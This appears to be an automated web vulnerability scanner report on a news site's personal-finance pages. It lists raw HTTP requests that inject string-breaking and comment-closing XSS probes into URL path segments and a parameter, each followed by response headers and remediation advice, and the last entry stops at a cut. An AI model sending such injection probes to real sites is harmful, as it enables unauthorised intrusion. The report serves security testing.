GET /personal-finance/family/Landlord+held+hostage+real+estate+investments/39887189f536'%3bbcf3f98d4ac/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71534
Expires: Sun, 19 Dec 2010 03:11:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/family/landlord-held-hostage-real-estate-investments/39887189f536';bcf3f98d4ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=family;kw=landlord-held-hostage-real-estate-investments;kw=39887189f536';bcf3f98d4ac;kw=npo;kw=fpo;tile='+dartad_tile+
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c61'%3b08087bcffd1 was submitted in the REST URL parameter 5. This input was echoed as 30c61';08087bcffd1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/30c61'%3b08087bcffd1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44855
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94b63'%3bbd61829af5f was submitted in the REST URL parameter 1. This input was echoed as 94b63';bd61829af5f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance94b63'%3bbd61829af5f/mortgages/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43570
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fbcf'%3b08c724ddf76 was submitted in the REST URL parameter 2. This input was echoed as 6fbcf';08c724ddf76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/mortgages6fbcf'%3b08c724ddf76/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43533
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955f6'%3bc2602442ea2 was submitted in the REST URL parameter 1. This input was echoed as 955f6';c2602442ea2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance955f6'%3bc2602442ea2/rrsp/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37625
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c4ce'%3b6614dfb9b81 was submitted in the REST URL parameter 2. This input was echoed as 8c4ce';6614dfb9b81 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/rrsp8c4ce'%3b6614dfb9b81/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37589
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26db8'%3bf32aae1b234 was submitted in the REST URL parameter 1. This input was echoed as 26db8';f32aae1b234 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance26db8'%3bf32aae1b234/taxes/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37646
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6f5'%3bf7f2d80e163 was submitted in the REST URL parameter 2. This input was echoed as cb6f5';f7f2d80e163 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/taxescb6f5'%3bf7f2d80e163/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43453
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad0d8'%3b873e41b709c was submitted in the REST URL parameter 1. This input was echoed as ad0d8';873e41b709c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financead0d8'%3b873e41b709c/tfsa/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37625
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c288d'%3bf31757b7249 was submitted in the REST URL parameter 2. This input was echoed as c288d';f31757b7249 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/tfsac288d'%3bf31757b7249/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43434
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1824'%3b04bbb0195ae was submitted in the REST URL parameter 1. This input was echoed as c1824';04bbb0195ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financec1824'%3b04bbb0195ae/wealthy-boomer/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43669
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bc04'%3b8e4687f8240 was submitted in the REST URL parameter 2. This input was echoed as 3bc04';8e4687f8240 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/wealthy-boomer3bc04'%3b8e4687f8240/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43634
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba345'%3bf7da2fb428a was submitted in the REST URL parameter 1. This input was echoed as ba345';f7da2fb428a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financeba345'%3bf7da2fb428a/your-money/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43589
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0f3d'%3bb50d399473c was submitted in the REST URL parameter 2. This input was echoed as f0f3d';b50d399473c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/your-moneyf0f3d'%3bb50d399473c/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37710
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3eba5'%3b318d557f68 was submitted in the REST URL parameter 1. This input was echoed as 3eba5';318d557f68 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /podcasts3eba5'%3b318d557f68/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:08:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:08:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36303
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 175fc'%3b71ae79ca80c was submitted in the REST URL parameter 1. This input was echoed as 175fc';71ae79ca80c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related175fc'%3b71ae79ca80c/topics/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43312
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f14'%3bead8597857b was submitted in the REST URL parameter 2. This input was echoed as 70f14';ead8597857b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related/topics70f14'%3bead8597857b/index.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43275
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10296'%3bc7eb73c65eb was submitted in the REST URL parameter 3. This input was echoed as 10296';c7eb73c65eb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related/topics/10296'%3bc7eb73c65eb HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43317
The value of the subject request parameter is copied into an HTML comment. The payload 85ce5-->cda0818e7d9 was submitted in the subject parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
